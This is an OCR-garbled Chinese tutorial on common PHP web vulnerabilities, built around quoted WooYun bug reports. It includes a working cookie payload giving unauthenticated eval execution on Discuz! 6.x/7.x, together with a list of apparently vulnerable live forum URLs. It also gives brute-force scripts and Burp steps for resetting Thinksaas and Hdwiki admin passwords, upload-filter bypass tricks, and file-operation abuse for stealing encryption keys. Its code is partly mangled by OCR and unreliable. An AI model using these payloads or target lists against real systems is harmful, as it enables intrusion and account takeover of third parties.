一 如 果 您 认 汶 本 辣 条 还 有 竺 完善， 请 编辑 司 条 上 一 篇 ad 下 一 篇 Su 


A 2m 
修复 方案 


无 尽 的 过 滤 。 


WooYun-2014-80723 : Discuz! 某 两 个 版 本 前 台 产 
品 命令 执行 〈 无 需 登录 ) 


Y 
漏洞 作者 : Jannock V 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-080723 


简要 描述 


总 有 人 翻 昌 程序 ， 我 也 翻 一 个 出 来 ! Discuz! 某 版 本 虽然 停止 维护 ， 但 使 用 量 
， 各 大 厂商 或 多 或 少 都 有 使 用 。 有 条 件 ， 直 接 存 在 命令 执行 ， 但 目前 大 多 
默认 配置 直接 支持 。 此 漏洞 在 互联 网 上 公开 过 ， 但 厂商 不 认为 是 漏洞 ?9 还 是 那 
4] : 没有 POC, 你 说 个 jb ! 不 登陆 ， 直 接 执行 


详细 说 明 
影响 版 本 : Discuz! 6.x/7.x 全 局 变量 防御 绕 过 漏洞 
互联 网 比较 有 人 公开 过 ， 看 : http://**.**.**.**/dzvul/sodb/19/sodb-2010-01 .txt 
那 时 描述 是 : Discuz! 6.x/7.x 全 局 变量 防御 绕 过 漏洞 POC : 缺 
能 由 于 作者 没有 放出 POC， 因 此 没有 得 到 别人 重视 。 
此 漏洞 利用 的 地 方 有 很 多 ， 不 限制 这 个 命令 执行 。 
漏洞 原理 就 不 说 了 ， 这 里 说 说 漏洞 利用 : 
文件 : 


include/discuzcode.func.php 


function discuzcode($message, $smileyoff, $bbcodeoff, $htmlon = 0, 
global $discuzcodes, $credits, $tid, $discuz uid, $highlight, < 
if($parsetype != 1 && !$bbcodeoff && $allowbbcode && (strpos($r 

$message = preg_replace("/\s?\[code\](.+?)\[\/code\]\s?/ie: 
j 
$msglower = strtolower($message); 
//$htmlon - $htmlon && $allowhtml ? 1 : 0; 
if(!$htmlon) { 

$message = $jammer ? preg_replace("/\r\n|\n|\r/e", "jammer | 
j 
if(!$smileyoff && $allowsmilies && !empty($GLOBALS[' DCACHE'][ 

if(!$discuzcodes['smiliesreplaced']) ( 

foreach($GLOBALS[' DCACHE']['smilies']['replacearray'] 


$GLOBALS[' DCACHE']['smilies']['replacearray'][S$ke 


j 
$discuzcodes['smiliesreplaced'] - 1; 
j 
$message = preg replace($GLOBALS[' DCACHE']['smilies']['se: 
j 
4 —B b] 





注意 到 119 47 : 


$message = preg replace($GLOBALS[ DCACHE'J['smilies']['searcharray’], 
$GLOBALS[' DCACHE'[smilies']['replacearray'], $message, $maxsmilies); 


此 ， 直 接 cookie 中 带 


GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[ DCACHE] 
[smilies][replacearray]=phpinfo(); 


即 可 执行 。 
请 求 中 Cookie 带 


GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[ DCACHE] 
[smilies][replacearray]-eval($ POST[c])963B; 


PIERD o XS TUR T TR ^R REL e 
随便 google 验证 了 一 下 ， 发 现 还 是 有 大 量 中 招 的 。 


漏洞 证 明 


























































































































€ t nap.sogou.com/t eg- 
NIENTE pe 
QUERY STRING kid=4627718extra=page%3D1apage=5 
IREQUEST URI J/bbs/viewthread.php?tid-462771&extra-page963D1&page-5 
[SCRIPT NAME |/bbs/viewthread.php 
HTTP Headers Information 
hp?tid-46277 1&extra-page?63D18page-5 HTTP/: 
K-Real-IP 
bc Forwarded- 
\Accept-Encoding |gzip,deflate 
User-Agent ozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 
irefox/32.0 
laccept text/html, application/xhtml+xml,application/xml;q=0.9,=/";q=0.8 
|Accept-Languagelzh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 
2Ww<¢> 控制 各 HTML css 脚本 DOM 网 络 Cookies ~ 
i | Cookies- 过 小 器 - 默认 (接受 第 = 方 cookie) ~ 
— B m E: 原始 大 小 | 路径 | 过 期 时 间 
国 suve .sohu,com 198 I 2015/01/04 48:14:34 
8 sohutag mbScSNCwm «sohu.com 1228 / 2015/08/08 12:00:00 
@ shenhuil2 .sohu.com 128 / 2015/01/06 FF: 
国 sgsa id -Sogou.com 33B I 2015/04/12 F +8: 
国 scrnSize .sohu.com 178 I 
® pgv_pvi «sogou.com 178 1 
® pDt_visitedfid  map.sogou.com 168 /bbs/ 2014/11/24 下 午 2:58:32 
® pDt_sid map.sogou.com 138 feos] 2014/11/01 FF: 
Œ pDt_onlineusernum map.sogou.com 198 Jobs] 2014/10/25 下 午 3 
Œ pDt_oldtopics map.sogou.com 288 jbbs/ 2014/10/25 F“ 
® cyan uv ‘sohu.com 38 1 2014/10/26 上 9:42:46 
困 ad -Sogou.com 66B 了 2014/11/22 £*10:00:19 
国 _smuid .sohu.com 288 / 
9 suv sogou .com 198 I 
困 suv .sohu,com 198 7 
@ sum .sogou.com 358 / 
国 SHAPUVID map.sogou.com 248 I 
= IPLOC. ,S0gou,cCom 1B / 
困 GLOBALS[ DCACHE][smilies][ searcharray] map.sogou.com 43B jobs 
国 GLOBALS[_DCACHE][smilies][replacearray] map.sogou.com 498 obs 2014/10/26 F 2:26:50 





论 PHP 常见 漏洞 


p. com/vi ewthr ead. php?tid-1772&extra-page-1&frombbs-1i 
http: 5. gamebar . com/viewthr ead. php?tid=5981 
http: 5321. com/viewthr ead. php?tid=5223 
http://iml viewthread. php?tid-982851&extra- 

| cn/viewthread.php?tid=158666&extra= 
Jg. com/viewthread. php?tid=92584 
pm/viewthread. php?tid=31966 
.org/viewthr ead. php?tid=5721 
n/viewthr ead. php?tid=16542 
iu. com/vi ewthr ead. php?tid=958886&extr a=page%3D1 
. com. cn/bbs/viewthr ead. php?tid=8974 
e. com/vi ewthr ead. php?tid=80753 


http: 



































http com/vi ewthr ead. php?tid=4466 

http: cn/bbs /vi ewthr ead. php?tid-775411 

http: om/viewthr ead. php?t id-180538 

http://42.1 :100/bbs /viewthr ead. php?tid-9972141&extra- 

http: //bbs jewthr ead. php?tid=2825980&extr a=page%3D1 

http: / /www ghang. com/forum/viewthr ead. php?tid-963&f i d=15&extr a=page%3D1&p 


Be DSB 5%B8%DF%B9%DC 

. com/vi ewthr ead. php?tid=20482&extr a=page%3D1 
http://www. n/bbs/viewthr ead. php?tid=258&extr a= 

. com/vi ewthr ead. php?tid=2846 


http: //bbs. ctice. com/viewthread. php?tid=29887 


http: //bbs. viewthread. php?t id-43722 

http://bbs.z /viewthr ead. php?tid=1369 

http://www. libbs /viewthr ead. php?tid=985 

http://www. om/viewthr ead. php?tid=231903&extr a=page%3D1 
http: //bbs. pm/vi ewthr ead. php?tid=667633 


http://bbs.s 
http: //bbs.z 
http: 
http: 
http://bbs.c 
http: //9yinb 
http://bbs.a 
http://www. 
http: //bbs. 
http://www. 
http://www. S 
http://bbs. 
http://www. 
http://bbs. 


/viewthr ead. php?action-printable&tid-7776 
com/viewthr ead. php?tid=183104&extr a=page%3D1 
WP. com/viewthr ead. php?action-printable&tid-152026 
jamebar. com/viewthr ead. php?tid=19667 
viewthr ead. php?tid=31966 

. com/viewthr ead. php?tid=450018&extr a=page%3D1 
om/vi ewthr ead. php?tid=7063 
/viewthr ead. php?tid=571081 

ice. com/viewthr ead. php?tid=29345 
/viewthr ead. php?tid=14094 

rium. com/viewthr ead. php?tid=250523 

@pm/vi ewthr ead. php?tid=79697&extr a=page=1 
er.org/forum/viewthr ead. php?tid=41428 

pwthr ead. php?tid=2424793&extr a=page%3D1 


http: //www. liedu. cn/forum/viewthr ead. php?tid=7983 
http://www. com/vi ewthr ead. php?t id-57083 
http://www. du. hk/cyberranger /bbs/viewthr ead. php?action-printable&tid-347 


A > GE 
修复 方案 


这 个 你 们 应 该 懂 ! 
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0x04 找 回 密码 出 现 的 问题 。 


下 面 介 绍 一 些 我 在 cms 遇 到 的 找 回 密码 时 候 犯 得 错误 。 


找 回 密码 很 多 都 是 验证 的 token 就 是 在 找 回 密码 的 时 候 生 成 一 个 token 然后 存储 到 
数据 库 中 。 然后 把 找 回 密码 的 地 址 发 到 邮箱 中 url? 302 7 token 由 用 户 点 开 后 就 能 
修改 密码 基本 就 是 验证 的 这 个 token。 其 实 一 般 的 可 以 找 回 任意 用 户 密码 的 原因 就 
是 弱 token 导致 可 以 被 攻击 者 搞 到 。 包括 很 多 厂商 验证 的 时 候 就 是 四 位 纯 数字 啥 
的 。 可 以 枚 举 。 当然 也 可 以 延伸 一 下 , 一 些 cms 的 密码 加 密 方 式 很 难 破 掉 。 有 时 候 
我 们 拿 到 了 管理 的 密码 破 不 掉 也 是 鸡肋 。 所 以 有 时 候 也 可 以 利用 这 种 方法 一 般 找 
回 密码 是 用 的 邮箱 首先 我 们 可 以 注入 把 管理 的 邮箱 注入 出 来 然后 再 去 找 回 密码 再 
把 数据 库 的 token 注 入 出 来 再 构造 一 下 地 址 就 能 重 置 密码 。 这 个 给 我 印象 比较 深 的 
是 在 ssctf 的 比赛 中 嘛 当时 机 油 问 了 问 我 那 wordpress 那 题 有 个 插件 的 注入 然后 因 
为 都 知道 wp 的 加 密 基 本 很 难 破 。 所 以 也 是 用 的 这 种 方法 。 因为 一 般 都 是 弱 token 的 
问题 随便 找 几 个 例子 了 


rand 函数 生成 的 token 


$resetpwd = md5(rand()); 


可 以 看 到 这 个 生成 的 token 就 是 对 rand() 函 数 生 成 出 来 的 数字 进行 md5 一 次 
来 看 一 下 rand() 


注释 : 在 某 些 平台 下 (例如 Windows) RAND MAX 只 有 32768。 如 果 需 要 的 范围 
大 于 32768， 那 么 指定 min 和 max 参数 就 可 以 生成 大 于 RAND. MAX 的 数 了 ， 或 
者 考虑 用 mt rand() RËRE o 如 果 不 指定 一 些 参数 的 话 那么 最 大 值 才 32768 一 

个 并 不 算 大 的 值 那么 我 们 首先 对 这 32768 种 可 能 md5 出 来 一 个 列表 然后 我 们 直接 

枚 举 这 32768 种 可 能 总 会 有 一 个 对 的 。 


例子 : WooYun: Thinksaas 找 回 密码 处 设计 错误 利用 账户 可 找 回 密码 。 


修改 hdwiki 任 意 用 户 密 码 


$encryptstring=md5($this->time.$verification.$auth) ; 


补丁 后 多 了 一 个 $auth$timetemp=date("Y-m-d H:i:s",$this->time);$auth = 
util::strcode($timetemp, 'ENCODE'); 可 以 $auch 是 对 时 间 来 了 一 个 算法 。 结果 这 
个 算法 的 KEY 并 没有 初始 化 导致 了 如 果 我 们 知道 了 这 个 时 间 就 可 以 自己 生成 出 来 
加 蜜 的 字符 串 这 里 带 入 算法 的 是 时 间 这 里 是 我 们 可 以 知道 的 。 


例子 : WooYun: Hdwiki 设 计 缺 陷 知 邮箱 可 改 赛 码 (包括 管理 员 ) // 绕 过 补丁 继续 找 
回 hdwiki 任 意 用 户 密 码 


WooYun-2014-50304 : Thinksaas 找 回 密码 处 设计 
错误 利用 账户 可 找 回 移 码 。 


coe d 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-050304 


简要 描述 


找 回 密码 处 设置 的 链接 不 好 把 。。 


详细 说 明 
找 回 密码 处 发 送 邮 件 给 找 回 密码 的 地 址 但 是 找 回 密 码 的 地 址 只 有 一 个 变量 。 
只 要 知道 要 找 回 的 账户 就 可 以 直接 爆破 。 


.../thinksaas2/index.php? 
app=user&ac=resetpwd&mail=admin@...&set=1d8c9f7 1eaa6923fc9d3cd5d10aea 
4ce 


找 回 密 码 的 地 址 。 app ac mail 这 些 都 是 知道 的 只 有 set 不 知道 。 


在 /app/user/action/forgetpwd.php 处 。 


$resetpwd = md5(rand()); 


$new[ 'user' ]->update('user', array( 


'email'-»$email, 
),array( 
'resetpwd'-»$resetpwd, 
)); 
// 发 送 邮件 


$subject = $TS_SITE['base']['site title'].' 会 员 密 码 找 回 '， 


$content 
echo $content; 
[rpg 
可 以 看 到 只 有 $resetpwd 不 知道 。 但 是 
$resetpwd = md5(rand()); 
是 随机 的 然后 再 md5 RAND MAX 只 有 32768 
所 以 可 以 爆破 之 。 


写 个 脚本 循环 给 1-32768 md5 一 次 然后 再 载 入 burpsuite 进 


在 测试 过 程 中 最 少 的 一 次 只 有 300 多 。 最 多 的 一 次 20000 多 
爆破 速度 也 是 很 快 的 吃 个 饭 完 了 就 好 了 。 


漏洞 证 明 


循环 脚本 。 














2 日 <?Php 


for ($a=0;$a<32 6 引 : $a) { 
Sb = md5 (++Sa); 
echo "\r\n"; 





echo $b; 
: WWW.Wooyun. org 


! 您 的 登陆 信息 : «br />Email : 


' .$email.'<br /> 重 : 





行 爆破 。 


IX 这 个 都 看 运气 o o 


ib PHP 常见 漏洞 






EET EIS 
XO WEE) RKO) SEV) MC) 


Chcal238a80b923828dcc5 89a6£F75859b 
c81e728d9dhc2f636fF 867 F89cc15862c 
eccbc87elhb5ce2fe28388f dO9f2a7baf 3 
a87ff679a2f3e71d9181a67b7552122c 
e4da3b7 fbbce2345d7772b6674a318d5 
11679891c5a888Faf6fb5eó6887eb1b2dc 
8f1heh5fceeatló67a5a36dedd'ibea2543 
c9f BF895£Fb98ab9159f£51fd8297e236d 
abch8cce2e2d7fbdealafc51c7c6ad26 
d3d9446802a544259755038e64d163e828 
6512bdh3d9caa6e 02c99 0b 0a382652dca 
c28ad4d76fe97759aa27a8c99bfF6718 
Cc51ceA18c125a18e8db5e^4ib97fFc2afF39 
aab3238922bcc25aó6f686eb525fFfdc56ó 
9bf31c7ff862936a96d3c8bd1F8fF2fFF3 
c75d97b81eae257eA5aa9d5bade97baf 
7 Be fdf2ec9b 686 679795c442636b55Fb 
6F4922F45568161a8cdF4ad2299F6d23 
1f8e3dad99988345F7439F8FfFabdffch 
98f137882181954c5475687be6186a3b8^ 
3c59dc858e885 02 43be8079a5c75d 079 
bé6d767d2f8ed5d21a44b 86588668 8cb9 
37693cfc758849e45d87b8c7d8b9aacd 





1ffide775885f8dalSF WY RB Rn. org 


循环 出 来 的 数据 。 


然后 载 入 Burpsuite 


| Target | Positions | Payoads | Dptions | 





(2) Payload Sets 


Y'ou can define one or more payload sets. The number of payload sets depends on the 
available for each payload set, and each payload type can be customized in different w 





Payload set: 1 vj 
Payload type: | Simple list j 





(2) Payload Options [Simple list] 


Payload count: 10,000 


Request count: 10,000 


This payload type lets you configure a simple list of strings that are used as payloads. 





Paste 8af141d3c5a5146a3eac9d166ab4c458 


966bc24156ab8397ab2303e8e4cdb4c7 


Load ... 06029401238841782058efac46f64b0f 
— — ——— | 812649f8ed0e2e1d911298ec67ed9e61 

Remove 6618c9849717ee8f5bc1630f4d44d2cb 
——— | bec26f4a5bef41402139699b991bca01 


| Cear | fa246d0262c3925617b0c72bb20eeb1d 





b7a782741 f667201bS4880c925 faec4b 





了 








wwWw.Wooyun.org 


论 PHP 常见 漏洞 






GET 
/thinksaas2/ index. php?app=user&ac=resetpwd&mai |=admin@admin. com&set= $faagafea4gef2ff029a833ccc 
ET HTTP/1.1 

Host: 127.0.0.1 

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 

Accept: text/html, application/xhtml*xml, application/xml ;q=0. 9, */*:q-0. 8 

Accept-Language: zh-cn, zh; q=0. 8, en-us; q=0. 5, en; q=0. 3 

Accept-Encoding: gzip. deflate www.wooyun.or 
















0 ie} B), baseline request 
- a87 ff679a2f3e71d9181a67b754... 200 O G 6828 
3 eccbc87e4bSce2fe28308fd9f2a... 200 Oo Oo 6828 
2 c81e728d9d4c2f636f067f89cc1.. 200 口 口 6828 
1 c4ca4238a0b923820dcc509a6f... 200 [m & 6828 
5 &4da3b7fbbce2345d7772b0674... 200 O @ 6828 
T 8f14e45fceea167a5a36dedd4b... 200 O B), 6828 
8 c9f0f895fb98ab9159f51fd0297... 200 口 口 6828 
6 1679091c5a880faf6fb5e6087eb... 200 D B), 6828 
9 45c48cce2e2d7fbdealafc51c7.. 200 O 国 6828 
d3d9446802a44259755d38e6d1... & B), 





观察 length 可 以 知道 哪个 是 正确 的 。 可 以 看 到 我 这 个 在 7446 的 时 候 就 成 功 了 。 


然后 直接 访问 

4m Load URL | http://127.0.0.1/thinksaas2/index.php?app=user&ac=resetpwd&mail=admin@admin.com&set=1d8c9f71eaa6923fc9d3cd5d10aea4ce 
Q spit URL 
») Execute 














Enable Post data Enable Referrer 





ThinkSAAS 首页 ThinkSAAS ”随便 看 看 EC mius 


首页 人 小 组 文章 ”相册 NIE wie 搜索 动态 资料 任务 积分 部 换 更 多 


xEBJ, 2.03K f£, FX JUN TEBUGE 





重 设 密码 

Email : admin@admin. com 
新 密码 : 

重复 新 密码 : 


提交 
www.wooyun.org 


重 置 成 功 。 
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下 是 不 要 用 随机 的 把 。 
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WooYun-2014-67410 : Hdwiki 设 计 缺 陷 知 邮箱 可 
改 密码 (包括 管理 员 ) 


Y 
ee, i 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-067410 


简要 描述 

上 Hdwiki 官 网 发 现 更 新 日 期 一 直 都 没 变 。 还 以 为 一 直 都 没 更 新 了 , 结果 今天 下 载 一 
个 下 来 看 看 。 发 现 之 前 发 的 洞 竞 然 都 补 掉 了 。 看 了 看 之 前 这 个 改 密码 那个 对 比 了 
一 下 。 发 现 增强 了 点 验证 。 加 入 了 一 个 算法 。 


不 过 。 o o o o o 


ps. 更 新 程序 了 应 该 还 是 把 日 期 更 新 了 一 下 要 不 别人 会 一 直 以 为 没 更 新 的 。 


详细 说 明 
http://**.**.**.**/bugs/wooyun-2014-055786 
上 次 的 现在 来 看 看 现在 的 。 


f&'& X control/user.php 


jelse( 
$timetemp-date("Y-m-d H:i:s",$this->time); 
$auth = util::strcode(S$timetemp, 'ENCODE'); 
$verification= rand(1000,9999); 
$encryptstring=md5($this->time.$verification.$auth) ; 
$reseturl-WIKI URL."/index.php?user-getpass-".$user['u: 
$ ENV['user']-»update getpass($user['uid'],$encryptstr: 
$mail subject = $this-»setting['site name'].$this-»viev 
$mail message = $this-»view-»lang['resetPassMs1'].$use! 
$this->load('mail'); 
$ ENV['mail']->add(array(), array($email), $mail_subjec 


$this->message($this->view->lang['emailSucess'], 'index 





$encryptstring=md5($this->time.$verification.Sauth); 
现在 所 验证 的 对 比 之 前 的 可 以 发 现 多 了 一 个 $auth RA AGA RAY © 
$timetemp=date("Y-m-d H:i:s",Sthis-»time); 


$auth = util::strcode($timetemp, 'ENCODE'’); 
这 里 获取 了 一 下 时 间 然后 


function strcode($string, $action='ENCODE' ) { 


$key = substr(md5($_SERVER[ "HTTP_USER_AGENT" ].PP_KEY),8, 
$string = $action == 'ENCODE' ? $string : base64 decode! 
$len = strlen($key); 

$code EE 


for($i-0; $i < strlen($string); $i--)( 


$k = $i % $len; 
$code .= $string[$i] ^ $key[$k]; 
j 
$code = $action == 'DECODE' ? $code : base64 encode($code), 


return $code; 


EE] 





主要 关注 他 的 key 怎 么 来 的 。 

$key = substr(md5($_ SERVER["HTTP_USER_AGENT"].PP_KEY),8, 18); 
首先 对 USER_AGENT.PP_KEY MD5 一 次 然后 再 来 取 。 

等 等 。。User agent 是 用 户 可 控 的 , PP_KEY 呢 ? 

竟然 没有 初始 化 , 那么 PP_KEY 就 是 PP_KEY 那么 这 个 $key 全 部 就 可 控 了 。 
所 以 我 们 可 以 想 对 什么 加 密 就 对 神 马 加 密 了 。 

$timetemp=date("Y-m-d H:i:s",$this->time); 

$auth = util::strcode($timetemp, 'ENCODE'); 

然后 这 个 是 对 时 间 加 密 一 次 如 果 知 道 时 间 的 话 就 能 知道 $auth 

然后 继续 $this->time.$verification.$auth 

第 一 个 就 是 时 间 惟 第 二 个 rand(1000,9999) 有 8999 种 可 能 直接 枚 举 第 三 个 知道 时 
间 就 可 以 了 。 


FR IE) LE PA 


这 里 由 于 管理 员 和 用 户 在 同一 个 表 所 以 可 以 直接 改 管理 员 的 密码 。 


首先 http://**.**.**.**/web/hdwiki/index.php?user-getpass 


然后 把 要 管理 员 的 邮箱 输入 进去 。 


在 点 提交 之 前 打开 (提交 的 时 候 一 定 要 改 一 下 user agent 如 果 不 改 user agent 会 对 


应 不 上 的 我 这 里 改 成 的 是 asd) 


http://**.**.**.**/Tools/unixtime.aspx 


然后 在 点 提交 的 时 候 APT A BR 并 记录 下 来 。 


(我 本 地 时 间 有 点 不 准 无 伤 大 雅 ) 
以 我 演示 的 为 例 , at RA 1405589070 
然后 把 这 个 时 间 惟 转换 为 时 间 


1405589070 -> 2014/7/17 17:24:30 (时 间 不 准 IE A. 


$timetemp=date("Y-m-d H:i:s",Sthis->time) 


Y-m-d Hiis 这 个 的 格式 是 这 样 的 年 份 -月份 - 日 子 小 时 :分 钟 : 秒 

所 以 把 2014/7/17 17:24:30 对 应 下 来 为 2014-7-17 17:24:30 

但 是 这 样 是 不 对 的 ALA Y-m-d H:is 获 取 的 是 格林 威 治标 准时 间 

与 北京 时 间 正 好 相差 8 个 小 时 所 以 $timetemp=2014-07-17 09:24:30 


5l 入 EAS 

然后 带 入 那个 算法 当中 

lei lel | ; Easy 1ak Administrato... 3 YUSeCia SES B ||| <YPhp 

INT væ @ SQL XSS- Encryption". Encoding" 

9 [E 9" Cs$a-$ GET[a]; 

局 LoadURL  |web.com/yu.php?a- 2014-07-17 09:24:30 

Split URL echo streode ($a); 

» Execute function strcode ($string, $action= ENCODE’ ) { 

[E] Enable Post data Enable Referrer tk 
ey 

$len 








然后 这 样 就 拿 到 了 $auth 
然后 写 个 脚本 把 8999 种 情况 全 部 遍历 出 来 


1405589070$iBIMHBUkAVkwHBxYICw8BVw0BBA== 


= substr (md5 (asd. PP HE), 8; 18): 


$string - 7i $string : base64_decode ($string); 


$code 
for ($i=0; < lu M 


ie = $action == ° DECODE’ ? $code : base64_encode ($code); 
return $code; 





WWW.Wooyun.ord 


ay 
ü b?6226434de4ccdðdd79400e87aaea35 
5 267d3hbe465382dbda@277998db8bb9da3f 
3 php 5d43a34c?7h4a5ch@c524c6e55dd98627 
289a76ceg9937?7692aecbofbe9dfaece8d 

for (acloo0 jecipot fort) C P E 

= 3 : s 3 m le a 1 

eet oe UB - $a.” BIMHBUKAVkwHBxYICWBBVwWOBBA==" ); Irate 
csl $b:} : c264ef 3alecBacO?631df5e468fcabci 
2» 2 b2df2758c52f ae6bei5fhc7672"7"?cf 7f 
D1ff68e23fefe2bBBf ceebi421ab6fd5 

f73f1bað35a37b0664d7d4a47e82b320 


4Uacf23bUf8cf8Bab5fbcibffebeiU27 


A—E NIA 


bb47ecifc54709d602684f7£ 90887886 
if 678 68 Ga8 bf 4aa73a3GB9ab6216447F BP 
lef ab6ca2baa?7dbf ?7ai77318eaG6ch75 
6596e4b768da251327059f07b039f502 
5f5beceebfifBab685fb64153bd62019 
3 d348a382615eda@28b48d3hb6451f97?5e 
4 Of 5edb5688238b87£5c4415a6b1d7a85 
dO6684f ebf1e88552ab6a9d7c24f£8811 
if 37c0£221c8767£ 41af £08c34dB895c2 
a?3b76be26a8ad6dł?66aðcabíi8d5f150 
D:\ApmServ\PHP>php for.php >h.txt 


tie 








把 8999 种 情况 全 部 导出 来 然后 载 入 burpsuite 














| Status Timeout | Length * | Comment 





| Error 
LJ 



























P ON GROUP 














c80f70 z pn = - F " 
Le 我 的 HDWiki - Powered .. x | jhttp://web....2009:24:30 = | |. WooYun.org | 提交 漏洞 | [ai] Y-m-d H'is_ 百 度 搜索 IE. L3 date(^Y-m-c 
e40f5az i z i Osd41 "— E Y 
| € e web.com/web/hdwiki/index.php?user-getpass-1-1f3a961af38ad412a98 2 回 C "- , n 
2 ME B 访问 最 多 EasyTalk Administrato.. 4b 90sec 信 息 安 全 小 组 KI Exploit-DB 漏 洞 公 布 EasyTalk Administrato... Eg 1337Day :  90secTools [S] 国内 
12 dfda41a} INT v = 6 SQL XSS- Encryption». Encoding” Other- 
13 4a95d1 ws Load URL  |http://web.com/web/hdwiki/index.php?user-getpass-1-1f3a961af38ad412a978cf5ff3d90d24 





11 fA2ch71 


Q Split URL 


» Execute 


Request Respo 





Raw | Params 





[E] Enable Post data Enable Referrer 


设置 您 的 新 密码 





新 密码 @eececeee 密码 不 能 为 主 ， 最 多 32 下 
确认 密码 





www.wooyun.org 


前 面 那 id 那里 就 是 管理 员 的 id 肯定 是 为 1 的 。 


ES 


修复 方案 
增强 验证 
增强 算法 
随机 生成 一 个 Key 咋 样 。 


0x05 上 传 


这 个 上 传 就 大 概 说 说 。 


一 般 的 上 传 漏洞 可 能 是 未 验证 上 传 后 组 或 者 是 验证 上 传 后 级 被 bypass 或 者 是 上 传 
的 文件 验证 了 上 传 后 组 但 是 文件 名 不 重 命 名 。 


对 于 那些 验证 了 后 级 但 是 文件 名 不 重 命名 的 
一 般 可 以 试 试 截断 yu.php%00.jpg 当然 %00 要 urldecode 
当然 毕竟 截断 鸡肋 了 。 上 面 提 到 过 限制 条 件 了 。 
还 可 以 是 结合 各 种 webserver 的 解析 漏洞 
例如 iis6 的 xx.asp/yu.jpg yu.php;.jpg yu.asp;.jog aspx 当然 不 能 这 样 解 析 了 。 
如 果 不 重 命名 的 就 上 传 这 样 就 行 了 。 


Nginx 的 低 版 本 解析 漏洞 : yu.jpg/1.php 对 于 这 种 直接 上 传 一 个 xxxx.jpg 再 在 这 后 面 
加 上 各 种 /.php 试 试 的 


Apache 解 析 漏 洞 yu.php.xxx 在 最 后 一 个 后 组 识别 不 出 来 的 时 候 那么 就 向 上 解析 
最 终 解 析 成 .php 
像 phpweb 后 台 那 个 上 传 漏洞 。 很 多 人 遇 到 apache 的 时 候 


无 法 截断 的 时 候 就 上 传 一 个 yu.php.jpg 有 些 人 比较 疑问 的 是 为 啥 有 时 候 成 功 有 时 候 
失败 。 


这 个 主要 是 看 os 像 windows 的 话 .jpg 就 直接 是 图 片 了 
所 以 在 windows 下 就 直接 识别 成 图 片 了 而 不 是 .php 
而 在 linux 下 .jpg 不 被 识别 就 向 上 识别 成 .php 
这 些 解 析 漏 洞 在 上 传 中 也 挺 经 常 遇 到 的 。 
上 传 的 验证 一 般 是 MIME、 客 户 端的 JS 验证 、 白 名 单 、 黑 名 单 。 
前 面 两 种 都 比较 简单 。 
白 名 单 就 是 允许 用 户 上 传 哪些 后 组 的 。 黑 名 单 就 是 禁止 用 户 上 传 哪些 后 缓 的。 


这 两 种 相 ARV ARG FS T bypass A. o 黑 名 单 的 绕 过 还 是 得 具体 看 他 黑 

名 单 的 代码 。 有 的 直接 大 小 写 就 过 。 有 些 没 对 文件 名 trim 的 直接 在 文件 名 后 面 加 
空格 。 Windows 下 的 文件 名 后 %81-%99 decode 后 的 或 者 是 Windows 下 的 特性 
.php::$data 这 样 上 传 上 去 依 昌 是 .php 


其 实 上 传 还 挺 重要 的 。。 但 是 我 又 不 知道 说 哪些 。 还 是 具体 看 代码 把 。 


任意 文件 操作 


这 个 主要 是 涉及 到 的 是 任意 文件 删除 任意 文件 复制 任意 文件 重 命名 任意 文件 移动 
任意 文件 下 载 ...... o 因为 像 现在 的 cms 很 多 部 自 带 得 时 有 加 密 解密 函数 例如 
qibocms 的 mymd5 Dz 的 authcode 啥 的 。 对 于 这 些 任意 文件 操作 的 首先 可 以 试 斌 
拿 到 配置 文件 中 的 数据 库 的 连接 帐号 和 密码 尝试 外 联 一 下 但 是 很 多 时 候 都 是 只 多 
许 本 地 连 的 很 多 时 候 不 好 利用 的 时 候 可 以 利用 拿 到 配置 文件 然后 4 Bil 3x HE Ky He AY 
key 然后 自己 生成 一 个 加 密 的 字符 串 然后 再 结合 具体 的 代码 进行 最 大 化 的 利用 。 


对 于 任意 文件 删除 


级 是 插 不 好 利用 的 ， 还 是 结合 具体 的 场景 ， 有 些 因为 全 局 的 过 滤 而 不 能 注入 的 ， 
Tag RULE RSC» AB NSA > ARTA 一 般 的 利用 还 是 通过 出 除 安 
装 文 件 生成 的 lock 文 件 ， 然 后 达到 重 装 
RIRA ° 


例子 : WooYun: phpyun (20141230) 任意 文件 删除 致 注入 可 改 任意 用 户 密码 (4 处 打 
包 ) 


意 文件 复制 /任意 文件 移动 | 任意 文件 重 命名 


复制 的 话 肯定 涉及 到 了 要 复制 的 文件 要 复制 到 的 路 径 。 
如 果 是 要 复制 的 文件 可 控 要 复制 到 的 路 径 不 可 控 的 话 例如 qibocms 之 前 的 一 个 洞 


copy (ROOT_PATH."$webdb[updir]/$value", ROOT_PATH."$webdb[updir]/{$ve 
4| = 
这 里 $value 是 可 控 的 但 是 又 不 能 截断 复制 到 的 路 径 限 制 了 .jpg 结 尾 。 
这 时 候 我 们 就 可 以 把 $value 控 制 为 保存 了 qibocms 的 加 密 函 数 的 key 的 配置 文件 
然后 复制 后 成 了 一 个 .jpg 那 我 们 就 可 以 直接 打开 看 到 key 了 
例子 : WooYun: Qibocms 图 片 系统 任意 文件 查看 导致 的 多 处 注入 (可 提升 自己 为 管理 


员 ) 





如 果 两 个 都 完全 可 控 的 话 那 肯定 是 直接 把 自己 的 图 片 复制 成 一 个 .php 马 儿 了 。 


EEL TFR 


其 实 跟 上 面 复 制 差 不 多 ， 很 多 时 候 也 是 通过 下 载 配 置 文件 拿 到 key。 再 进行 各 种 操 
作 o o 


例子 : WooYun: qibocmsV7 整 站 系统 任意 文件 下 载 导 致 无 限制 注入 多 处 (可 提升 自己 
为 管理 Demo 演 示 ) 


这 个 例子 还 涉及 到 了 一 个 win 的 特性 bypass 黑 名 单 


WooYun-2014-88418 : phpyun (20141230) 任意 
文件 删除 致 注入 可 改 任意 用 户 密码 (4 处 打包 ) 


X 
漏洞 作者 : UN V 
KÆ : http:/www.wooyun.org/bugs/wooyun-2014-088418 


简要 描述 

更 新 了 来 看 看 。 果然 是 功能 越 多 bug 越 多 bug 越 多 rank 越 多 。 这 个 不 小 心 测试 了 
下 demo, 把 demo 的 robots.txt 和 图 标 都 删除 了 。 你 们 自己 再 加 上 去 下 把 。 
